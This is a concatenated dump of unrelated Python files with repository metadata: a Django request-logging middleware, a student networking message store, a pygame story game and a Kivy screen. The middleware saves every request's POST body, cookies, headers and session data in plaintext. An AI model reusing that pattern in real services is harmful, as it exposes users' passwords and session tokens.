2013-12-08T18:06:34
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from .models import HTTPRequest


def serialize_value(value):
    from django.contrib.sessions.backends.db import SessionStore
    if isinstance(value, (str, unicode)):
        return value
    elif isinstance(value, (dict, SessionStore)):
        result = []
        for name, val in value.items():
            result.append('%s = %s' % (name, val))
        return u'\n'.join(result)
    elif value is None:
        return ''
    else:
        return 'Unknown'


class StoreRequestsDB(object):
    def process_request(self, request):
        if request.user.is_authenticated():
            user = request.user
        else:
            user = None
        HTTPRequest(
            path=serialize_value(request.path),
            path_info=serialize_value(request.path_info),
            method=serialize_value(request.method),
            encoding=serialize_value(request.encoding),
            GET=serialize_value(request.GET),
            POST=serialize_value(request.POST),
            COOKIES=serialize_value(request.COOKIES),
            FILES=serialize_value(request.FILES),
            META=serialize_value(request.META),
            user=user,
            session=serialize_value(request.session)
        ).save()
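As a usage note, this middleware only runs if the project registers it; a minimal sketch assuming the main/middleware.py path shown in this record and a pre-1.10 Django settings module using MIDDLEWARE_CLASSES.

# Sketch of settings.py registration, not from the repo. Ordering matters:
# process_request() reads request.session and request.user, so the session
# and authentication middleware must run before StoreRequestsDB.
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'main.middleware.StoreRequestsDB',
)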
UTF-8
Python
false
false
2,013
18,064,632,480,881
7744d6b6e8fcf0c1ec5d323e5388da681e073fe0
cfab0600a37012b34ea8d7e58cc1c140c7f69b5a
/storage.py
3209a9f8f142da08b22bb7c131039ea06f329c5f
[ "GPL-2.0-only" ]
non_permissive
riolowry/cs3780-networks
https://github.com/riolowry/cs3780-networks
c40ccd90b552568f92af201c3597849b56c9c73f
91b591f62a38f6bd641a1ee83e5099a31805bd02
refs/heads/master
2021-01-22T09:48:27.862232
2013-11-29T15:36:08
2013-11-29T15:36:08
13,946,745
0
1
null
null
null
null
null
null
null
null
null
null
null
null
null
'''
3780 Networking Project server
@author Rio Lowry, Lezar de Guzmann
'''

import json
import heapq
import threading


class MessageStorage():
    def __init__(self):
        self.messages = self.read_from_file()
        for destination, messagelist in self.messages.items():
            # Delete empty lists and heapify the rest
            if messagelist:
                heapq.heapify(messagelist)
            else:
                del self.messages[destination]

    def add_message(self, message):
        # Add a message with its destination as key
        destination = message["Destination"]
        if destination not in self.messages:
            self.messages[destination] = []
        heapq.heappush(self.messages[destination], [message["Seq_No"], message])
        self.write_to_file()

    def add_message_to_ip(self, message, ip):
        # Add a message with ip as key
        if ip not in self.messages:
            self.messages[ip] = []
        heapq.heappush(self.messages[ip], [message["Seq_No"], message])
        self.write_to_file()

    def add_client(self, ip):
        # Add a client ip as a destination key
        if ip not in self.messages:
            self.messages[ip] = []

    def remove_message(self, destination):
        # Remove and return message for destination with lowest seq no
        message = heapq.heappop(self.messages[destination])[1]
        self.write_to_file()
        return message

    def write_to_file(self):
        # Write messages to file
        try:
            with open('savedmessages.json', 'w') as f:
                json.dump(self.messages, f)
        except IOError, e:
            print "I/O error: %s" % e

    def read_from_file(self):
        # Read messages from file
        try:
            with open('savedmessages.json', 'r') as f:
                return json.load(f)
        except IOError, e:
            print "I/O error: %s" % e
            return {}


class ClientList():
    def __init__(self):
        self.active_clients = []
        self.clients = []
        self.timer = threading.Timer(600.0, self.reset_clients)
        self.timer.daemon = True
        self.timer.start()

    def add_client(self, ip):
        # Add a client to the list
        if ip not in self.clients:
            self.clients.append(ip)

    def add_active_client(self, ip):
        # Make client active
        if ip not in self.active_clients:
            self.active_clients.append(ip)

    def client_is_active(self, ip):
        # Return false if ip is not in clients
        return ip in self.clients

    def reset_clients(self):
        # Function to reset the list of clients to those active
        self.clients = self.active_clients
        self.active_clients = []
        print "CLIENTS RESET. Active clients: %s" % (self.clients, )
        self.timer = threading.Timer(600.0, self.reset_clients)
        self.timer.daemon = True
        self.timer.start()

    def stop_timer(self):
        self.timer.cancel()
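A short illustrative round trip through MessageStorage (not part of the repo); the message keys match the ones the class reads above, the values are made up.

# Sketch only: messages for a destination come back lowest Seq_No first,
# because add_message pushes [Seq_No, message] onto a heap.
storage = MessageStorage()
storage.add_message({"Destination": "10.0.0.2", "Seq_No": 1, "Body": "hello"})
storage.add_message({"Destination": "10.0.0.2", "Seq_No": 0, "Body": "first"})
print storage.remove_message("10.0.0.2")["Body"]   # -> "first"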
UTF-8
Python
false
false
2,013
8,418,135,900,434
2cefd4164b4da9d2a451058ab09b35a63dc01116
b22cbe574c6fd43fde3dc82441805917b5996bb2
/test/__init__.py
60db52edf219630178b07dfd1f69a0edfb5bf388
[]
no_license
matthagy/hlab
https://github.com/matthagy/hlab
7a7b16526ee06f9b6211e387795e09c6438b536c
1bea77cf6df460f1828f99f3a54251d20e2d0f3d
refs/heads/master
2021-01-25T03:26:52.311278
2012-07-23T16:20:11
2012-07-23T16:20:11
2,352,334
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
'''Test of hlab '''
UTF-8
Python
false
false
2,012
8,014,408,982,061
8583bdf632fb523acce13d85125a3f1952c19e77
6a84450928ca6d23793bbc814cb910a5f3c07a8f
/gamelib/InTheEnd.py
fdaaa59ba15f6188b335aca4876ed4e9991e50c5
[ "MIT" ]
permissive
mcanultyfamily/InTheEnd
https://github.com/mcanultyfamily/InTheEnd
ce11d23a0e9b51582f5d34cb9a613177831535eb
798f9a63e65209a932170d57d37186db36fe87b4
refs/heads/master
2016-09-05T18:22:02.970320
2012-09-15T23:58:06
2012-09-15T23:58:06
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python import time import datetime import pygame import utils import data WINDOW_WIDTH = 800 WINDOW_HEIGHT = 500 class ClockPane(utils.Pane): end_time = None # End-Time survives multiple ClockPanes... time_left = None clock_ticking = False tick_sound = None tick_base_volume = None def __init__(self, sit): utils.Pane.__init__(self, sit, 600, 0, 800, 30, (0,0,0)) self.ticks_to_play = 0 self.fade_out_ticks = 3 self.time_str = "" def set_time(self, time_str): self.time_str = time_str self.render() def render(self): self.g.screen.blit(self.background, (self.x_offset, self.y_offset)) self.render_text(self.time_str, utils.GameFont("monospace", 22, (255, 40, 40)), 10, 2) def start_clock(self, seconds, restart=False): if restart: ClockPane.clock_ticking = False if not ClockPane.clock_ticking: ClockPane.tick_sound = pygame.mixer.Sound("default_cant_move_back.wav") ClockPane.tick_base_volume = ClockPane.tick_sound.get_volume() ClockPane.endtime = datetime.datetime.now()+datetime.timedelta(seconds=seconds) ClockPane.clock_ticking = True ClockPane.time_left = ClockPane.endtime-datetime.datetime.now() self.tick() def start_sound(self, ticks=6, fade_out_ticks=3): self.ticks_to_play = ticks self.fade_out_ticks = fade_out_ticks def stop_sound(self): self.ticks_to_play = 0 def play_tick(self): if self.ticks_to_play: if self.fade_out_ticks: volume = ClockPane.tick_base_volume*min(1.0, self.ticks_to_play/(self.fade_out_ticks+1.0)) else: volume = ClockPane.tick_base_volume #print "TICK VOLUME - %s ticks to play, %s fade_out_ticks, %0.4f base vol : %0.4f vol" % (self.ticks_to_play, self.fade_out_ticks, self.tick_base_volume, volume) ClockPane.tick_sound.set_volume(volume) ClockPane.tick_sound.play() self.ticks_to_play -= 1 def stop_clock(self): ClockPane.clock_ticking = False def tick(self): if ClockPane.clock_ticking: time_left = ClockPane.endtime-datetime.datetime.now() if self.ticks_to_play and int(time_left.seconds)!=int(ClockPane.time_left.seconds): self.play_tick() ClockPane.time_left = time_left time_left = str(time_left)[:-2] self.set_time(time_left) class Possesion(object): def __init__(self, image_file, name=None, full_image=None): self.count = 1 self.image = data.load_image(image_file) if full_image: self.full_image = data.load_image(full_image) else: self.full_image = None if not name: name = image_file.split(".")[0] self.name = name self.rect = None self.selected = None def render(self, g, x, y): if not self.count: return 0, 0 g.screen.blit(self.image, (x, y)) if self.count!=1: g.render_text(str(self.count), utils.GameFont("monospace", 12, (0,0,0)), x, y) self.rect = self.image.get_rect().move(x, y) if self.selected: BORDER = 4 self.rect = self.rect.inflate(BORDER, BORDER) pygame.draw.rect(g.screen, (0,255,0), self.rect, BORDER) return self.rect[2], self.rect[3] # TODO - handle move move to hover... class ItemsPane(utils.Pane): def __init__(self, sit): utils.Pane.__init__(self, sit, 600, 230, 800, 500, (200,180,180)) if hasattr(sit, "g"): self.real_g = sit.g else: self.real_g = g self.render() def add_possession(self, item): self.real_g.add_possession(item) self.render() def remove_possession(self, item): self.real_g.remove_possession(item) self.render() def render(self): self.sit.log("RENDER ITEMS PANE") self.g.screen.blit(self.background, (self.x_offset, self.y_offset)) x = 604 y = 234 max_h = 0 for item in self.real_g.possessions: iw, ih = item.image.get_size() bottom = y+ih if bottom>496: print "TOO MANY POSSESSIONS! 
- can't print %s" % item.name continue right = x+iw if right>796: x = 604 y += max_h max_h = 0 bottom = y+ih if bottom>496: print "TOO MANY POSSESSIONS! - can't print %s" % item.name continue w, h = item.render(self.g, x, y) max_h = max(max_h, h) x += (w+4) def event_click(self, mouse, mouse_up): need_render = False show_overlay_item = None DOUBLE_CLICK_TIME = 0.1 for item in self.real_g.possessions: if item.rect.collidepoint(mouse): if not item.selected: need_render = True elif time.time()>(item.selected+DOUBLE_CLICK_TIME): show_overlay_item = item item.selected = time.time() elif item.selected: item.selected = False need_render = True if need_render: self.render() if show_overlay_item and not mouse_up: self.sit.show_overlay(show_overlay_item.full_image) class SituationBase(utils.SituationBase): def __init__(self, g): utils.SituationBase.__init__(self, g) size = self.g.screen.get_size() self.background = pygame.Surface(size).convert() self.background.fill((255, 255, 255)) self.panes = {} self.clock_pane = self.add_pane("CLOCK", ClockPane(self)) self.items_pane = self.add_pane("ITEMS", ItemsPane(self)) self.rendered = False def add_pane(self, name, pane): pane.name = name self.panes[name] = pane return pane def event_click(self, mouse, mouse_up): self.log("SITUATION BASE EVENT CLICK") for n, p in self.panes.items(): if p.rect.collidepoint(mouse): self.log("EVENT CLICK : %s" % n) p.event_click(mouse, mouse_up) return def display(self): if not self.rendered: self.render() self.panes['CLOCK'].tick() pygame.display.flip() def render(self): self.log("RENDER Situation Base") self.rendered = True self.g.screen.blit(self.background, (0, 0)) for n, p in self.panes.items(): p.render() class SpinImageSituation(SituationBase): def __init__(self, g, image_file, next_situation_class, time_text, spin_rate=100, rotations=2, press_next=True): SituationBase.__init__(self, g) self.next_situation_class = next_situation_class self.FRAME_RATE = spin_rate self.ROTATE_INCREMENT = 5 self.base_image = data.load_image(image_file) self.base_center = self.base_image.get_rect().center self.main_pane = self.add_pane("PAPER", utils.Pane(self, 0, 0, 600, 500, (255, 255, 255))) self.add_pane("MINIMAP", MapPane(self)) if time_text: self.clock_pane.set_time(time_text) self.current_angle = 0 self.rotations_left = rotations self.need_draw = True if (press_next): font = pygame.font.Font(None, 36) text = font.render("Press Space to continue", 1, (10, 10, 10)) textpos = text.get_rect() textpos.centerx = self.main_pane.background.get_rect().centerx textpos.y = self.main_pane.background.get_rect().bottom - 40 self.main_pane.background.blit(text, textpos) def rotate_image(self): #self.log("Rotations Left %s, current angle: %s" % (self.rotations_left, self.current_angle)) if self.current_angle==0: image = self.base_image rect = image.get_rect() else: image = pygame.transform.rotate(self.base_image, self.current_angle) rect = image.get_rect() rect.center = self.base_center return image, rect def display(self): if self.need_draw: self.main_pane.blit(self.main_pane.background, (0, 0)) if self.rotations_left: for i in range(3): image, rect = self.rotate_image() self.main_pane.blit(image, rect.topleft) self.current_angle += 5 if self.current_angle>=360: self.current_angle = 0 self.rotations_left -= 1 break else: self.main_pane.blit(self.base_image, (0,0)) self.need_draw = False pygame.display.flip() class FirstNewspaperSituation(SpinImageSituation): def __init__(self, g): SpinImageSituation.__init__(self, g, "first_news.png", 
SecondNewspaperSituation, "Sept. 10, 2312") self.g.add_possession(Possesion("first_news_item.png", "First Newspaper", full_image="first_news.png")) class SecondNewspaperSituation(SpinImageSituation): def __init__(self, g): SpinImageSituation.__init__(self, g, "second_news.png", InvitationSituation, "Sept. 19, 2407") self.g.add_possession(Possesion("second_news_item.png", "Second Newspaper", full_image="second_news.png")) class EmergencyNewspaperSituation(SpinImageSituation): def __init__(self, g): SpinImageSituation.__init__(self, g, "emergencydeclared.png", MainSituation_apartment, "Dec. 19, 2407") self.g.add_possession(Possesion("emergencydeclared_item.png", "Emergency Declared", full_image="emergencydeclared.png")) class InvitationSituation(SpinImageSituation): def __init__(self, g): SpinImageSituation.__init__(self, g, "letterforinterview.png", QuizSituation, "Sept 16, 2407", spin_rate=100, rotations=0) self.g.add_possession(Possesion("letterforinterview_item.png", "Interview Invitation", full_image="letterforinterview.png")) class OpeningCredits(SpinImageSituation): def __init__(self, g): SpinImageSituation.__init__(self, g, "openingcredits.png", FirstNewspaperSituation, "Sept 19, 2407", spin_rate=100, rotations=0) class ClosingCredits(SpinImageSituation): def __init__(self, g): SpinImageSituation.__init__(self, g, "closingcredits.png", None, "Sept 19, 2407", spin_rate=100, rotations=0) def next_situation(self): utils.python_quit = True class QuestionPane(utils.Pane): def __init__(self, sit, width, background, picture, desc, responses, show_next, text_x=None, font_size=20, answer_y=200): utils.Pane.__init__(self, sit, 0, 0, width, 500, (250,250,250)) if background: self.background = background self.width = width self.picture = picture self.desc = desc self.show_next = show_next self.next_button = None self.answer = None self.font_size = font_size if text_x: self.text_x = text_x self.text_y = 25 elif (width > 500): self.text_x = 150 self.text_y = 75 else: self.text_x = 10 self.text_y = 25 self.answer_y = answer_y self.unpressed_font = utils.GameFont("monospace", self.font_size, (0,0,0)) self.pressed_font = utils.GameFont("monospace", self.font_size, (30,148,89)) self.responses = [] x = self.text_x y = self.render_question() width = self.width-(20+x) y = max(self.answer_y, y) for id, response, reply in responses: response = response.strip() if response: ct = utils.ClickableText(self, response, self.unpressed_font, x, y, id, width) ct.reply = reply ct.id = id self.responses.append(ct) y += ct.rect[3]+(self.font_size/5) if not self.responses: self.next_y = y self.show_next = True self.create_next_button() else: self.next_y = 400 self.sit.key_handlers[pygame.K_n] = self._next_key self.sit.key_handlers[pygame.K_RIGHT] = self._next_key self.sit.key_handlers[pygame.K_SPACE] = self._next_key self.sit.key_handlers[pygame.K_RETURN] = self._next_key self.sit.key_handlers[pygame.K_a] = self._select_A self.sit.key_handlers[pygame.K_b] = self._select_B self.sit.key_handlers[pygame.K_c] = self._select_C def render(self): self.sit.log("RENDER QUESTION PANE") if self.background: self.blit(self.background, (0,0)) if self.picture: self.blit(self.picture, (0, 0)) self.render_question() for ct in self.responses: ct.render() self.render_reply() if self.next_button: self.next_button.render() def render_question(self): width = self.width-(20+self.text_x) ignored, rect = self.render_text_wrapped(self.desc, self.unpressed_font, self.text_x, self.text_y, width) return self.text_y+rect[3]+30 def event_click(self, 
mouse, mouse_up): self.sit.log("event_click %s - %s [next button %s]" % (mouse, mouse_up, bool(self.next_button))) # Handle Next Button if self.next_button and self.next_button.mouse_in_rect(mouse): if mouse_up: self.sit.done = True elif self.next_button.set_font(utils.GameFont("monospace", self.font_size, (80,80,80))): self.next_button.render() return True # check for fake Next button if not self.responses: return True # Check answers answer = None for ct in self.responses: if ct.mouse_in_rect(mouse): answer = ct # Select answer if answer: self.sit.log("Clicked Answer: %s" % answer.text) if mouse_up: self.sit.log("mouse up %s" % answer.text) self.select(answer) return True else: return False def select(self, answer): if not self.responses: self.sit.done = True return if self.answer: # -- Reset the answer text and clear the reply self.answer.set_font(self.unpressed_font) self.answer.render() self.clear_reply() self.answer = None self.answer = answer self.answer.set_font(self.pressed_font) self.answer.render() self.render_reply() self.create_next_button() def clear_reply(self): if self.answer and self.answer.reply: area = pygame.Rect(self.reply_left, self.reply_top, self.reply_width, self.reply_height) self.blit(self.sit.background, (self.reply_left, self.reply_top), area=area) self.blit(self.background, (self.reply_left, self.reply_top), area=area) self.next_y -= self.reply_height self.sit.log("Cleared reply, %s, new next_y: %s" % (area, self.next_y)) def render_reply(self): if self.answer and self.answer.reply: mono_font = utils.GameFont("monospace", 20, (153, 128, 18)) self.reply_top = y = self.next_y self.reply_width = self.w - self.text_x - 10 self.reply_left = self.text_x ignored, rect = self.render_text_wrapped(self.answer.reply, mono_font, self.reply_left, self.reply_top, self.reply_width) self.reply_height = rect[3] area = pygame.Rect(self.reply_left, self.reply_top, self.reply_width, self.reply_height) self.next_y += self.reply_height self.sit.log("Rendered reply, %s, new next_y: %s" % (rect, self.next_y)) def create_next_button(self): if self.show_next and not self.next_button: x = (self.width*2)/3 self.next_button = utils.ClickableText(self, "Next", utils.GameFont("monospace", 20, (0,0,0)), x, self.next_y) def _next_key(self, event): if self.next_button: self.sit.done = True def _select(self, id): if self.responses: resp = self.responses[id] else: resp = None self.select(resp) def _select_A(self, event): self._select(0) def _select_B(self, event): self._select(1) def _select_C(self, event): self._select(2) class QuizSituationBase(SituationBase): questions = {} questions_by_q = {} def __init__(self, g): SituationBase.__init__(self, g) self.FRAME_RATE = 5 badge = data.load_image("fbi_badge.png") self.panes['BADGE'] = utils.Pane(self, 600, 30, 800, 230, (255,255,255), background=badge) self.panes['BADGE'].render() self.clock_pane.set_time("Oct. 
3, 2407") if not QuizSituationBase.questions: self.load_questions() def load_questions(self): records = data.read_csv("InterviewQuiz.csv", self.g.game_data) QuizSituationBase.questions = dict([(rec['Number'], rec) for rec in records]) QuizSituationBase.questions_by_q = dict([(rec['Question'], rec) for rec in records]) class QuizSituation(QuizSituationBase): def __init__(self, g, q_num='1'): QuizSituationBase.__init__(self, g) self.this_rec = QuizSituationBase.questions[q_num] background_image = data.load_image("interview_room2.jpg") interviewGuy = pygame.transform.smoothscale(data.load_image("InterviewGuyLarge.png"), (117, 192)); p = QuestionPane(self, 600, background_image, interviewGuy, self.this_rec['Question'], [(c, self.this_rec["Response %s" % c], self.this_rec['Answer to %s' % c]) for c in "ABC"], show_next=True) self.main_pane = self.add_pane("MAIN", p) self.render() self.log("Q: %s" % self.this_rec['Question']) def next_situation(self): if utils.python_quit: return None; self.g.add_quiz_answer(self.this_rec['Question'], self.main_pane.answer.text) q_num = self.this_rec['Next Number'] if q_num in QuizSituationBase.questions: return QuizSituation(self.g, q_num) else: return QuizSummarySituation(self.g) def event_key_any(self, event): pass PLANET_INFO = [ ["EndoDelta", "Endo Delta (aka Emotionally Disturbed)", 1], ["Shokugak", "Shokugaki (aka Shotgun)", 2], ["Mizar3", "Mizar 3 (aka Mystery)", 0], ] class QuizSummarySituation(QuizSituationBase): def __init__(self, g): QuizSituationBase.__init__(self, g) self.main_pane = self.add_pane("MAIN", utils.Pane(self, 0, 0, 600, 500, (255,255,255))) self.calc_score() def calc_score(self): self.score = 0.0 for q, a in self.g.quiz_answers: entry = QuizSituationBase.questions_by_q[q] for c in "ABC": if entry["Response %s" % c]==a: self.add_score(entry['Score %s' % c]) found = True break assert(found) self.log("QUIZ SCORE: %s" % self.score) self.g.game_data['QUIZ_SCORE'] = self.score def add_score(self, value): before = self.score if value.startswith("div "): val = int(value.replace("div ", "").strip()) self.score = self.score/val self.log("Add score %s/%s -> %s" % (before, val, self.score)) elif value.startswith("mult "): val = int(value.replace("mult ", "").strip()) self.score = self.score * val self.log("Add score %s * %s -> %s" % (before, val, self.score)) else: val = int(value.strip()) self.score += val self.log("Add score %s + %s -> %s" % (before, val, self.score)) def render(self): QuizSituationBase.render(self) self.main_pane.render_text("This is you:", utils.GameFont("monospace", 30, (0, 0, 0)), 10, 10) FONT_SIZE = 12 y = 50 for q, a in self.g.quiz_answers: self.main_pane.render_text(q, utils.GameFont("monospace", FONT_SIZE, (0, 0, 0)), 25, y) y += FONT_SIZE+2 self.main_pane.render_text(a, utils.GameFont("monospace", FONT_SIZE, (30,148,89)), 30, y) y += FONT_SIZE+4 self.next_button = utils.ClickableText(self.g, "Next", utils.GameFont("monospace", 20, (0,0,0)), 200,y+40) def next_situation(self): quiz_score = self.g.game_data['QUIZ_SCORE'] if quiz_score>15: idx = 0 elif quiz_score<-15: idx = 1 else: idx = 2 return TicketTo_Base(self.g, idx) def event_click(self, mouse, mouse_up): if mouse_up and self.next_button.mouse_in_rect(mouse): self.done = True def event_key(self, event): self.done = True class Ticket(Possesion): def __init__(self, shortname, fullname): Possesion.__init__(self, "ticket%s_item.png" % shortname, fullname, "ticket%s.png" % shortname) class TicketTo_Base(SpinImageSituation): def __init__(self, g, idx, 
next_situation=EmergencyNewspaperSituation, time_str="Oct 1st, 2407"): shortname, fullname, other_idx = PLANET_INFO[idx] SpinImageSituation.__init__(self, g, "ticket%s.png" % shortname, next_situation, time_str, spin_rate=100, rotations=0) self.g.add_possession(Ticket(shortname, fullname)) self.g.game_data['HAVE_TICKET_IDX'] = idx self.g.game_data['HAVE_TICKET_TO'] = fullname self.g.game_data['DONT_HAVE_TICKET_TO'] = PLANET_INFO[other_idx][1] class TicketTo_EndoDelta(TicketTo_Base): def __init__(self, g): TicketTo_Base.__init__(self, g, 0) class TicketTo_Shokugak(TicketTo_Base): def __init__(self, g): TicketTo_Base.__init__(self, g, 1) class TicketTo_Mizar3(TicketTo_Base): def __init__(self, g): TicketTo_Base.__init__(self, g, 2) class MapPane(utils.Pane): locations = None def __init__(self, sit): utils.Pane.__init__(self, sit, 600, 30, 800, 230, (140,180,160)) self.background = data.load_image("MiniMap.png") class Location(object): def __init__(self, rec): self.name = rec['Location'] self.x = int(rec['x']) self.y = int(rec['y']) if not MapPane.locations: MapPane.locations = {} for rec in data.read_csv("map_locations.csv", self.g.game_data): if rec['Location']: loc = Location(rec) MapPane.locations[loc.name] = loc if not self.g.movement_path: self.move_to_location("Apartment") else: self.render() def event_click(self, mouse, mouse_up): if self.mouse_in_pane(mouse): x, y = self.window_to_pane_xy(mouse[0], mouse[1]) self.sit.log("CLICKED MAP: %s, %s" % (x, y)) return True else: return False def move_to_location(self, loc_name): if self.g.movement_path and \ self.g.movement_path[-1].name==loc_name: return location = MapPane.locations[loc_name] self.g.movement_path.append(location) self.render() def render(self): self.sit.log("RENDER MAP PANE") self.blit(self.background, (0, 0)) points = [(loc.x+self.x_offset, loc.y+self.y_offset) for loc in self.g.movement_path] if len(points)>1: closed = False width = 6 pygame.draw.lines(self.g.screen, (255,0,0), closed, points, width) radius = 6 width = 0 pygame.draw.circle(self.g.screen, (255,0,0), points[-1], radius, width) class QuestionSituation(SituationBase): def __init__(self, g, csv_path): SituationBase.__init__(self, g) self.FRAME_RATE = 22 self.log("Reading config %s" % csv_path) self.scenes = dict([(rec['Number'], rec) for rec in data.read_csv(csv_path, self.g.game_data)]) self.map_pane = self.add_pane("MINIMAP", MapPane(self)) self.set_current_scene('1') def event_response_one(self, event): self._event_response("A") def event_response_two(self, event): self._event_response("B") def event_response_three(self, event): self._event_response("C") def event_click(self, mouse, mouse_up): SituationBase.event_click(self, mouse, mouse_up) if self.main_pane.answer: NUM_ID_TO_ALPHA_ID = {1:'A', 2:'B', 3:'C'} self._event_response(NUM_ID_TO_ALPHA_ID[self.main_pane.answer.id]) def event_key_any(self, event): pass def _event_response(self, id): next_scene = self.curr_scene.get('%s Next Number' % id) self.log("_event_response id: %s, next scene: %s" % (id, next_scene)) if not next_scene or next_scene in ['0', '-1']: self.done = True else: self.set_current_scene(next_scene) def set_current_scene(self, scene_id): self.curr_scene = self.scenes[scene_id] if self.curr_scene.get("Item"): self.items_pane.add_possession(Possesion(self.curr_scene['Item'])) if self.curr_scene.get("Location"): self.map_pane.move_to_location(self.curr_scene['Location']) picture_file = self.curr_scene.get("Picture to display") if picture_file: picture = data.load_image(picture_file) else: 
picture = None special_a_number = self.curr_scene['A Next Number'] if not special_a_number or special_a_number in ['0','-1']: responses = [] for k in [pygame.K_1, pygame.K_2, pygame.K_3]: if k in self.key_handlers: del self.key_handlers[k] else: responses = [(idx+1, self.curr_scene["Response %s" % c].strip(), "") for idx, c in enumerate("ABC")] self.key_handlers[pygame.K_1] = self.event_response_one self.key_handlers[pygame.K_2] = self.event_response_two self.key_handlers[pygame.K_3] = self.event_response_three p = QuestionPane(self, 600, None, picture, self.curr_scene['Scenario'], responses, show_next=False, text_x = 20, font_size=18, answer_y=250) self.main_pane = self.add_pane("MAIN", p) self.render() class MainSituation(QuestionSituation): def __init__(self, g, sit_file, next_situation_class): QuestionSituation.__init__(self, g, sit_file) self.FRAME_RATE = 22 self.log("Initialiing mainsituation - sit_file %r" % sit_file) self.next_situation_class = next_situation_class self.clock_pane.start_clock(60*60*2) # 2 hours #self.clock_pane.start_sound(10, 5) self.render() def next_situation(self): self.log("next_situation: entering") if utils.python_quit: self.log("next_situation: quit") sit = None elif self.curr_scene['A Next Number']=='0': sit = self.special_next_situation(self.curr_scene['B Next Number']) self.log("next_situation: special: %s" % sit) elif self.curr_scene['A Next Number']=='-1': sit = self.game_over() self.log("next_situation: game over: %s" % sit) else: sit = self.next_situation_class(self.g) return sit def special_next_situation(self, id): """ Override this to handle 'special situations' based on responses """ return self.next_situation_class(self.g) def game_over(self): """Override this to handle non-standard game-over paths""" return ClosingCredits(self.g) class MainSituation_apartment(MainSituation): def __init__(self, g, sit_file="apartment.csv"): MainSituation.__init__(self, g, sit_file, MainSituation_initialstreet) class MainSituation_initialstreet(MainSituation): def __init__(self, g, sit_file="initialstreet.csv"): MainSituation.__init__(self, g, sit_file, MainSituation_buildingonfire) class MainSituation_religiousnuts(MainSituation): def __init__(self, g, sit_file="religiousnuts.csv"): MainSituation.__init__(self, g, sit_file, MainSituation_motherandchild) def special_next_situation(self, value): if value =='2': self.g.friendsMiddleSchoolers = True else: self.g.friendsMiddleSchoolers = False self.log("friendsMiddleSchoolers: %s, value: %r"%(self.g.friendsMiddleSchoolers, value)) return MainSituation.special_next_situation(self,value) class MainSituation_buildingonfire(MainSituation): def __init__(self, g, sit_file="buildingonfire.csv"): MainSituation.__init__(self, g, sit_file, MainSituation_religiousnuts) def special_next_situation(self, value): if value !='0': self.g.savedPeople = True else: self.g.savedPeople = False self.log("savedPeople: %s, value: %r"%(self.g.savedPeople, value)) return MainSituation.special_next_situation(self, value) class MainSituation_motherandchild(MainSituation): def __init__(self, g, sit_file="motherandchild.csv"): MainSituation.__init__(self, g, sit_file, MainSituation_spaceportgeneral1) def special_next_situation(self, value): if value=='3': have_idx = self.g.game_data['HAVE_TICKET_IDX'] shortname, fullname, get_idx = PLANET_INFO[have_idx] return TicketTo_Base(self.g, get_idx, next_situation=self.next_situation_class, time_str=None) else: return MainSituation.special_next_situation(self, value) class 
MainSituation_spaceportgeneral2(MainSituation): def __init__(self, g, sit_file="spaceportgeneral2.csv"): MainSituation.__init__(self, g, sit_file, ClosingCredits) class MainSituation_spaceportgeneral1(MainSituation): def __init__(self, g, sit_file="spaceportgeneral1.csv"): MainSituation.__init__(self, g, sit_file, MainSituation_spaceportgeneral2) def special_next_situation(self, value): if (self.g.savedPeople): return MainSituation_spaceportsavedpeople(self.g) elif (self.g.friendsMiddleSchoolers): return MainSituation_spaceportmiddleschool(self.g) else: self.log("HERE! I'm HERE!") return MainSituation_spaceportgeneral2(self.g) class MainSituation_spaceportsavedpeople(MainSituation): def __init__(self, g, sit_file="spaceportsavedpeople.csv"): MainSituation.__init__(self, g, sit_file, MainSituation_spaceportgeneral2) def special_next_situation(self, value): if (self.g.friendsMiddleSchoolers): return MainSituation_spaceportmiddleschool(self.g) else: return MainSituation_spaceportgeneral2(self.g) class MainSituation_spaceportmiddleschool(MainSituation): def __init__(self, g, sit_file="spaceportmiddleschool.csv"): MainSituation.__init__(self, g, sit_file, MainSituation_spaceportgeneral2) def special_next_situation(self, value): return MainSituation_spaceportgeneral2(self.g) # TODO: layout blocks... class InTheEndGame(utils.GameBase): def __init__(self): utils.GameBase.__init__(self) DISPLAY_SIZE = (800, 500) DISPLAY_MODE = 1 self.init_display(DISPLAY_SIZE, DISPLAY_MODE) pygame.display.set_caption("In the End") #self.screen = pygame.display.set_mode((0,0), pygame.FULLSCREEN) pygame.key.set_repeat(250, 50) self.game_data = {} self.game_data['HAVE_TICKET_IDX'] = 0 self.game_data['HAVE_TICKET_TO'] = 'TEST HAVE PLANET' self.game_data['DONT_HAVE_TICKET_TO'] = "TEST OTHER PLANET" self.quiz_answers = [] self.possessions = [] self.movement_path = [] self.savedPeople = False self.friendsMiddleSchoolers = False def add_possession(self, item): if item.name in self.game_data: self.game_data[item.name].count += 1 else: self.possessions.append(item) self.game_data[item.name] = item def remove_possession(self, name): item = self.game_data[name] item.count -= 1 if not item.count: del self.game_data[name] self.possessions.remove(item) def make_opt_epilog(self): return "" def add_quiz_answer(self, q, a): self.game_data[q] = a self.quiz_answers.append([q,a]) def first_situation(self): return OpeningCredits(self) def _jump_to_situation(self): if self.jump_to.endswith(".csv"): self.jump_to = "MainSituation_%s" % self.jump_to.split(".csv")[0] sit = globals()[self.jump_to](self) utils._log("JUMPING TO SITUATION: %s (%s)" % (self.jump_to, sit.__class__.__name__)) return sit if __name__ == '__main__': utils.main(InTheEndGame)
UTF-8
Python
false
false
2,012
824,633,728,404
8cf70794e87e8013b04ba4179231847d4f2ae87c
38004a40c21ab98a1a538b0e1c1ca4aa33d19525
/client/post_game.py
d73c56f024a135e85e7600592a1015af9bee4c39
[]
no_license
alexmojaki/spylight
https://github.com/alexmojaki/spylight
eb84a82c126644c265b26dafb86b58bad829bf2e
636717137c2617e3d6bdc123d9668b1bf06151d9
refs/heads/master
2020-03-22T12:19:44.563940
2013-05-22T12:29:51
2013-05-22T12:29:51
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: utf-8 -*-

from kivy.lang import Builder
from kivy.uix.screenmanager import Screen

from client import utils
from client.character import teams


class PostGameScreen(Screen):
    def __init__(self, app, data, **kwargs):
        Builder.load_file(utils.kvPath.format('post_game_screen'))
        self.game_duration = str(data['ttime'])
        self.win_msg = teams[data['winners']]['win_msg']
        self.app = app
